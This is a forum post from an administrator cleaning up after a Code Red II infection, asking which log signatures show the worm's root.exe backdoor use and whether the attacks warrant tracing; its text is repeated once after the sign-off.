Can anyone give me a FOR SURE logfile fingerprint on the *ENTIRETY* of the Code Red II worm??
I'm aware of the "default.ida" buffer overflow fingerprint, but I want to know if any of the "root.exe" files that are executed by default of if those must be exploited manually by a malicious user.
I have a fingerprint of several days of repeated attempts to compromise the system through various "root.exe" copies of the Command Shell. Also, I have logs of an effective comprimise of "root.exe" and the installation of "admin.dll" and the replacement of "httpodbc.dll" via this backdoor.
I need to know whether to pursue the source of these attacks further or whether to chalk it up to a random-IP scan.
Please, no "only idiots get Code Red" comments- I'm just here to clean up someone else's mess. 🙂
Thanks!!
Eric
I'm aware of the "default.ida" buffer overflow fingerprint, but I want to know if any of the "root.exe" files that are executed by default of if those must be exploited manually by a malicious user.
I have a fingerprint of several days of repeated attempts to compromise the system through various "root.exe" copies of the Command Shell. Also, I have logs of an effective comprimise of "root.exe" and the installation of "admin.dll" and the replacement of "httpodbc.dll" via this backdoor.
I need to know whether to pursue the source of these attacks further or whether to chalk it up to a random-IP scan.
Please, no "only idiots get Code Red" comments- I'm just here to clean up someone else's mess. 🙂
Thanks!!
Eric
